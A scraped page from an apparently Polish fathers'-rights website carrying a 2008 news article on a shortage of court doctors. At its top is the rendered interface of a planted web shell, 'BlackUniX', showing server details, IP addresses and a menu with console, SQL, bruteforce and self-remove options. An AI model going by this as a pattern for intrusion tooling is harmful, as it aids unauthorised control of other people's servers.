W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:22:18
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Czy sądy czeka paraliż?
30.01.2008.
Od 1 lutego osoby, które z powodów zdrowotnych nie będą mogły się stawić w sądzie lub prokuraturze, muszą przedstawić zaświadczenie wystawione przez lekarza sądowego. A lekarzy nie ma. Kto będzie musiał mieć zaświadczenie wystawione przez lekarza sądowego?
Oskarżony, świadek i prawnik reprezentujący strony w sądach i prokuraturach. Brak zaświadczenia to nieusprawiedliwione niestawiennictwo. Grozi za to wysoka grzywna (do 10 tysięcy złotych) lub miesiąc aresztu.
Do tej pory zaświadczenie mógł wystawić każdy lekarz. Według szacunków Ministerstwa Sprawiedliwości medycy wystawiali ich co roku prawie milion. Prawnicy mówią, że za dużo. Nowa ustawa powołująca instytucję lekarza sądowego ma zapobiec lewym zwolnieniom. Na razie grozi jednak zamieszaniem, bo nikt nie przewidział, że lekarze nie będą zainteresowani taką formą pracy.

Tylko na Dolnym Śląsku prezesi czterech sądów okręgowych wyliczyli, że będzie im potrzebnych w sumie 460 medyków. Izba lekarska wystawiła rekomendację 40. Tylko tylu się zgłosiło. Ostatecznie umowy podpisało 10. – Podobnie jest w całym kraju – mówi prezes Naczelnej Rady Lekarskiej Konstanty Radziwiłł.

We Wrocławiu nie ma ani jednego lekarza sądowego, do najbliższego trzeba jechać 40 km. W Białymstoku wśród czterech lekarzy jest jeden ginekolog i jeden psychiatra. W okręgu krakowskim, gdzie wystawia się najwięcej zaświadczeń kardiologicznych, nie ma ani jednego takiego specjalisty. – Nie mamy dokładnych danych, ale znamy problem – przyznaje sędzia Sławomir Różycki z Ministerstwa Sprawiedliwości. I dziwi się, że lekarze odrzucają propozycję. – Wystawiając pięć zaświadczeń dziennie, można zarobić 8 tys. zł miesięcznie – zauważa Różycki.

80 zł za zaświadczenie to tylko pozornie godziwa stawka – uważają lekarze. – Podniesiono ją z 40 zł dopiero w styczniu i uwzględniono postulaty środowiska, by rozliczać również koszty dojazdów do pacjentów – zauważa Radziwiłł.

– Nie wiadomo, kto pokryje koszty dodatkowych badań. Dla medyków praca dla sądu to dodatkowe zajęcie, nie chcą zaniedbywać swoich pacjentów – dodaje dr Jacek Chodorski z Wrocławia. Lekarze przyznają też, że zaświadczenia będą szczególnie prześwietlane, bo zgłaszają się po nie również przestępcy. – A z tego więcej kłopotu niż zarobku – uważają.

Ministerstwo nie zamierza wydawać jakichkolwiek wytycznych sądom na najbliższe dni. – Ustawa jest restrykcyjna, nie zostawia pola manewru – wyjaśnia Sławomir Różycki z Ministerstwa Sprawiedliwości.

MS pracuje jednak nad uelastycznieniem przepisów. Uprawnieni do wydawania zaświadczeń byliby lekarze bez specjalizacji. Stare zasady mogłyby też obowiązywać do końca roku.
Źródło : Rzeczpospolita
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


20.06.2018.